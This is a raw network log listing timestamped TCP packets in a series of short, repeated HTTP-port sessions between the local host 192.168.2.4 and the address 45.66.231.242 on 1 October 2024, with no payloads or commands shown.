              Oct 1, 2024 10:55:27.085516930 CEST804975945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:27.085668087 CEST4975980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:27.085697889 CEST4975980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:27.090660095 CEST804975945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:27.247751951 CEST4976080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:27.252741098 CEST804976045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:27.252851009 CEST4976080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:27.255765915 CEST4976080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:27.260592937 CEST804976045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:27.260785103 CEST4976080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:27.265702009 CEST804976045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:27.951433897 CEST804976045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:27.951450109 CEST804976045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:27.951507092 CEST4976080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:27.951574087 CEST4976080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:27.956334114 CEST804976045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:28.099199057 CEST4976180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:28.104289055 CEST804976145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:28.104408026 CEST4976180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:28.106476068 CEST4976180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:28.111377001 CEST804976145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:28.111445904 CEST4976180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:28.116305113 CEST804976145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:28.839479923 CEST804976145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:28.839510918 CEST804976145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:28.839623928 CEST4976180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:28.839646101 CEST4976180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:28.844482899 CEST804976145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:28.985111952 CEST4976280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:28.989950895 CEST804976245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:28.990036011 CEST4976280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:28.992115974 CEST4976280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:28.996906042 CEST804976245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:28.997000933 CEST4976280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:29.001857042 CEST804976245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:29.661706924 CEST804976245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:29.661828995 CEST804976245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:29.661871910 CEST4976280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:29.661883116 CEST4976280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:29.666645050 CEST804976245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:29.795840979 CEST4976380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:29.800724030 CEST804976345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:29.800843000 CEST4976380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:29.802953959 CEST4976380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:29.807681084 CEST804976345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:29.807740927 CEST4976380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:29.812535048 CEST804976345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:30.557697058 CEST804976345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:30.557740927 CEST804976345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:30.557843924 CEST4976380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:30.558480024 CEST4976380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:30.563306093 CEST804976345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:30.718663931 CEST4976480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:30.723685980 CEST804976445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:30.723767996 CEST4976480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:30.725789070 CEST4976480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:30.730710983 CEST804976445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:30.730772018 CEST4976480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:30.735632896 CEST804976445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:31.394030094 CEST804976445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:31.394066095 CEST804976445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:31.394166946 CEST4976480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:31.394506931 CEST4976480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:31.399344921 CEST804976445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:31.529520988 CEST4976580192.168.2.445.66.231.242
              Oct 1, 2024 10:55:31.534382105 CEST804976545.66.231.242192.168.2.4
              Oct 1, 2024 10:55:31.534487963 CEST4976580192.168.2.445.66.231.242
              Oct 1, 2024 10:55:31.536519051 CEST4976580192.168.2.445.66.231.242
              Oct 1, 2024 10:55:31.541378021 CEST804976545.66.231.242192.168.2.4
              Oct 1, 2024 10:55:31.541451931 CEST4976580192.168.2.445.66.231.242
              Oct 1, 2024 10:55:31.546411991 CEST804976545.66.231.242192.168.2.4
              Oct 1, 2024 10:55:32.194015026 CEST804976545.66.231.242192.168.2.4
              Oct 1, 2024 10:55:32.194134951 CEST804976545.66.231.242192.168.2.4
              Oct 1, 2024 10:55:32.194134951 CEST4976580192.168.2.445.66.231.242
              Oct 1, 2024 10:55:32.194181919 CEST4976580192.168.2.445.66.231.242
              Oct 1, 2024 10:55:32.198987007 CEST804976545.66.231.242192.168.2.4
              Oct 1, 2024 10:55:32.326328993 CEST4976680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:32.331197977 CEST804976645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:32.331311941 CEST4976680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:32.340009928 CEST4976680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:32.344866037 CEST804976645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:32.344918966 CEST4976680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:32.349713087 CEST804976645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:33.024852037 CEST804976645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:33.024996996 CEST804976645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:33.025063992 CEST4976680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:33.044754982 CEST4976680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:33.049597025 CEST804976645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:33.267741919 CEST4976780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:33.272682905 CEST804976745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:33.272824049 CEST4976780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:33.281197071 CEST4976780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:33.286024094 CEST804976745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:33.286077976 CEST4976780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:33.290847063 CEST804976745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:33.949079990 CEST804976745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:33.949323893 CEST804976745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:33.949352026 CEST4976780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:33.949381113 CEST4976780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:33.954180002 CEST804976745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:34.104058027 CEST4976880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:34.110106945 CEST804976845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:34.110220909 CEST4976880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:34.113163948 CEST4976880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:34.118817091 CEST804976845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:34.118880987 CEST4976880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:34.123769999 CEST804976845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:34.773499012 CEST804976845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:34.773689032 CEST804976845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:34.773756981 CEST4976880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:34.776962042 CEST4976880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:34.781785011 CEST804976845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:34.921327114 CEST4976980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:34.926209927 CEST804976945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:34.926306009 CEST4976980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:34.928299904 CEST4976980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:34.933082104 CEST804976945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:34.933166027 CEST4976980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:34.937906027 CEST804976945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:35.684986115 CEST804976945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:35.685005903 CEST804976945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:35.685085058 CEST4976980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:35.685126066 CEST4976980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:35.689905882 CEST804976945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:35.827267885 CEST4977080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:35.832120895 CEST804977045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:35.832209110 CEST4977080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:35.834328890 CEST4977080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:35.839070082 CEST804977045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:35.839128017 CEST4977080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:35.843949080 CEST804977045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:36.536109924 CEST804977045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:36.536184072 CEST804977045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:36.536343098 CEST4977080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:36.536499023 CEST4977080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:36.541213989 CEST804977045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:36.694921017 CEST4977180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:36.699795961 CEST804977145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:36.699868917 CEST4977180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:36.701838970 CEST4977180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:36.706593037 CEST804977145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:36.706650972 CEST4977180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:36.711432934 CEST804977145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:37.350745916 CEST804977145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:37.350894928 CEST4977180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:37.351048946 CEST804977145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:37.351099014 CEST4977180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:37.355853081 CEST804977145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:37.512420893 CEST4977280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:37.517437935 CEST804977245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:37.517522097 CEST4977280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:37.519464970 CEST4977280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:37.524251938 CEST804977245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:37.524415970 CEST4977280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:37.529180050 CEST804977245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:38.216752052 CEST804977245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:38.216871977 CEST804977245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:38.216991901 CEST4977280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:38.216991901 CEST4977280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:38.221828938 CEST804977245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:38.362103939 CEST4977380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:38.367137909 CEST804977345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:38.367235899 CEST4977380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:38.369221926 CEST4977380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:38.374113083 CEST804977345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:38.374177933 CEST4977380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:38.379066944 CEST804977345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:39.220180988 CEST804977345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:39.220263004 CEST804977345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:39.220319986 CEST4977380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:39.220319986 CEST4977380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:39.225109100 CEST804977345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:39.372920990 CEST4977480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:39.378088951 CEST804977445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:39.378216028 CEST4977480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:39.380389929 CEST4977480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:39.385288954 CEST804977445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:39.385441065 CEST4977480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:39.390369892 CEST804977445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:40.152374029 CEST804977445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:40.152426958 CEST804977445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:40.152555943 CEST4977480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:40.155678034 CEST4977480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:40.160479069 CEST804977445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:40.313312054 CEST4977580192.168.2.445.66.231.242
              Oct 1, 2024 10:55:40.320162058 CEST804977545.66.231.242192.168.2.4
              Oct 1, 2024 10:55:40.320255995 CEST4977580192.168.2.445.66.231.242
              Oct 1, 2024 10:55:40.323199034 CEST4977580192.168.2.445.66.231.242
              Oct 1, 2024 10:55:40.328038931 CEST804977545.66.231.242192.168.2.4
              Oct 1, 2024 10:55:40.328120947 CEST4977580192.168.2.445.66.231.242
              Oct 1, 2024 10:55:40.332907915 CEST804977545.66.231.242192.168.2.4
              Oct 1, 2024 10:55:41.021992922 CEST804977545.66.231.242192.168.2.4
              Oct 1, 2024 10:55:41.022088051 CEST804977545.66.231.242192.168.2.4
              Oct 1, 2024 10:55:41.022138119 CEST4977580192.168.2.445.66.231.242
              Oct 1, 2024 10:55:41.022161007 CEST4977580192.168.2.445.66.231.242
              Oct 1, 2024 10:55:41.026896954 CEST804977545.66.231.242192.168.2.4
              Oct 1, 2024 10:55:41.180191994 CEST4977680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:41.372984886 CEST804977645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:41.373145103 CEST4977680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:41.376389980 CEST4977680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:41.381216049 CEST804977645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:41.381303072 CEST4977680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:41.386074066 CEST804977645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:42.240808964 CEST804977645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:42.240844011 CEST804977645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:42.240978003 CEST4977680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:42.241142035 CEST4977680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:42.246151924 CEST804977645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:42.407850981 CEST4977780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:42.412844896 CEST804977745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:42.412967920 CEST4977780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:42.415899038 CEST4977780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:42.421506882 CEST804977745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:42.421720982 CEST4977780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:42.427047968 CEST804977745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:43.424582958 CEST804977745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:43.424702883 CEST804977745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:43.424782038 CEST4977780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:43.424835920 CEST4977780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:43.429625034 CEST804977745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:43.576881886 CEST4977880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:43.581789970 CEST804977845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:43.581887007 CEST4977880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:43.584779978 CEST4977880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:43.589575052 CEST804977845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:43.589678049 CEST4977880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:43.594448090 CEST804977845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:47.272047043 CEST804977845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:47.272243023 CEST804977845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:47.272279024 CEST4977880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:47.272305965 CEST4977880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:47.277080059 CEST804977845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:47.451298952 CEST4977980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:47.456300020 CEST804977945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:47.456449986 CEST4977980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:47.459558010 CEST4977980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:47.464446068 CEST804977945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:47.464643955 CEST4977980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:47.469477892 CEST804977945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:48.112679958 CEST804977945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:48.112765074 CEST804977945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:48.112864017 CEST4977980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:48.112965107 CEST4977980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:48.117743969 CEST804977945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:48.275687933 CEST4978080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:48.280445099 CEST804978045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:48.280597925 CEST4978080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:48.287878990 CEST4978080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:48.292718887 CEST804978045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:48.292928934 CEST4978080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:48.297736883 CEST804978045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:48.953130007 CEST804978045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:48.953155994 CEST804978045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:48.953210115 CEST4978080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:48.966135979 CEST4978080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:48.973432064 CEST804978045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:49.326911926 CEST4978180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:49.331891060 CEST804978145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:49.332089901 CEST4978180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:49.343225956 CEST4978180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:49.348418951 CEST804978145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:49.348505974 CEST4978180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:49.353333950 CEST804978145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:50.175956964 CEST804978145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:50.176007986 CEST804978145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:50.176023006 CEST804978145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:50.176120043 CEST4978180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:50.176244020 CEST4978180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:50.181515932 CEST804978145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:50.330219984 CEST4978280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:50.335216045 CEST804978245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:50.335424900 CEST4978280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:50.338696003 CEST4978280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:50.343583107 CEST804978245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:50.343657017 CEST4978280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:50.348455906 CEST804978245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:50.990062952 CEST804978245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:50.990089893 CEST804978245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:50.990247011 CEST4978280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:50.990309000 CEST4978280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:50.995191097 CEST804978245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:51.131757975 CEST4978380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:51.136667967 CEST804978345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:51.136778116 CEST4978380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:51.139950991 CEST4978380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:51.144754887 CEST804978345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:51.144817114 CEST4978380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:51.149602890 CEST804978345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:51.897425890 CEST804978345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:51.898024082 CEST4978380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:51.898838043 CEST804978345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:51.898919106 CEST4978380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:51.902879000 CEST804978345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:52.132230043 CEST4978480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:52.137173891 CEST804978445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:52.137289047 CEST4978480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:52.151492119 CEST4978480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:52.156368971 CEST804978445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:52.156455994 CEST4978480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:52.161297083 CEST804978445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:53.034257889 CEST804978445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:53.034431934 CEST4978480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:53.034435987 CEST804978445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:53.034487009 CEST4978480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:53.039442062 CEST804978445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:53.180248976 CEST4978680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:53.185035944 CEST804978645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:53.185112000 CEST4978680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:53.188088894 CEST4978680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:53.192883015 CEST804978645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:53.192941904 CEST4978680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:53.197700977 CEST804978645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:53.833734035 CEST804978645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:53.833873987 CEST804978645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:53.833889008 CEST4978680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:53.833935976 CEST4978680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:53.838640928 CEST804978645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:53.973316908 CEST4978780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:53.980593920 CEST804978745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:53.980722904 CEST4978780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:53.983777046 CEST4978780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:53.988547087 CEST804978745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:53.988610983 CEST4978780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:53.993417978 CEST804978745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:54.638890028 CEST804978745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:54.638936043 CEST804978745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:54.639138937 CEST4978780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:54.639138937 CEST4978780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:54.643997908 CEST804978745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:54.944264889 CEST4978880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:54.949932098 CEST804978845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:54.950033903 CEST4978880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:54.952989101 CEST4978880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:54.958621979 CEST804978845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:54.958719969 CEST4978880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:54.964356899 CEST804978845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:55.642245054 CEST804978845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:55.642383099 CEST804978845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:55.642415047 CEST4978880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:55.642457962 CEST4978880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:55.647797108 CEST804978845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:55.781492949 CEST4978980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:55.786437988 CEST804978945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:55.786540031 CEST4978980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:55.788645983 CEST4978980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:55.793500900 CEST804978945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:55.793611050 CEST4978980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:55.798403978 CEST804978945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:56.438821077 CEST804978945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:56.438947916 CEST4978980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:56.438973904 CEST804978945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:56.439023972 CEST4978980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:56.443701982 CEST804978945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:56.579827070 CEST4979080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:56.584677935 CEST804979045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:56.584764957 CEST4979080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:56.586863041 CEST4979080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:56.591576099 CEST804979045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:56.591639996 CEST4979080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:56.596417904 CEST804979045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:57.288909912 CEST804979045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:57.289042950 CEST4979080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:57.289057970 CEST804979045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:57.289103985 CEST4979080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:57.293823004 CEST804979045.66.231.242192.168.2.4
